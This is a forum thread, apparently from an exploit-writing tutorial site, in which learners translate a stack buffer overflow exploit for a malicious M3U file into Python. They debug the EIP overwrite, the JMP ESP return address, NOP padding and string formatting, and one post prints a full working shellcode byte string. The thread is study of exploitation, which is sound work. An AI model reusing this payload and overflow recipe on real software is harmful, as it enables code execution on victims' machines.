Semisecure Login is not enabled!
June 21, 2011
I've been reading through the exploit writing tutorials here for a bit, and I've run into an issue that I was wondering if someone could help me with. I've been following along writing in python rather than perl, so I've been translating the code as I go. It was working out perfectly fine until I reached one spot. I've come to the point where I have an address in memory to overwrite EIP with to give the program a JMP esp command, but the program does not appear to be overwriting EIP with the correct address. I know I am writing to the correct location, because if I replace the memory address with 'BBBB', EIP is overwritten with '42424242' (when they are the only B's in the file).
I investigated to see if I was using the struct.pack() method in python in a way that it functioned differently from perl's pack() function. As far as I can tell, I'm using it right. I equated "pack('V', 0x<address>)" to "struct.pack('<L', 0x<address>)". If I am not mistaken, these two should yield the same results, as 'V' and '<L' stand for little-endian unsigned long in their respective languages.
As a few final pieces of information on my problem, I am trying to use the address '01a8f23a' and EIP ends up overwritten with '000FFD4E'. When I run the program, it does indeed crash, but it does not execute the shellcode, presumably because of the wrong data being in EIP.
EDIT: Shortly after posting this, I realized that the value stored in EIP was just a little bit larger than the address of ESP, so I added 25
NOPs to the beginning of my shellcode and it worked fine. Sorry for the trouble.
My full code:
Fuzzed = open('C:Documents and SettingsOwnerDesktopFuzzed.m3u','w')
Fuzzed.write('A' * 26072)
string = struct.pack('<L',0x01a8f23a)
shellcode = "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1
September 7, 2008
April 17, 2012
Can anyone expand a bit on how to accomplish the same in Python 3.x (3.2)? I'm having difficulty sending the EIP address in '\x41\x41\x41\x41' format. I have done a bit of search and found something regarding encoding differently. Is there a way to still send the EIP address correctly in Python 3?
September 7, 2008
July 17, 2012
@burnfile i get error "EOL while scanning scanning string literal" and if i use """ for storing shellcode in variable program executes without any error but the calcutor doesnt spawn this must b because it stores the string as we provide it incuding return character "\n"
shellcode = """xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1
i tried earlier which had all the shellcode in just one line it worked well but if the shellcode is to long it is not possible to accumulate in one line so can u plz help me with such stupid problem..!!!
this is the code which worked
shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
the shellcode string is whole one line
September 7, 2008
in python, you can put shellcode on multiple lines by wrapping it inside round brackets:
shellcode = ("\x01\x02\x03\x04"
Most Users Ever Online: 91
Currently Online: cihatix, Un0wn_X
Currently Browsing this Page:
Guest Posters: 1
Newest Members: Digitalspecops, RoninK9, topchau, lucaschau
Moderators: Peter Van Eeckhoutte (2942)
Administrators: Peter Van Eeckhoutte (2942)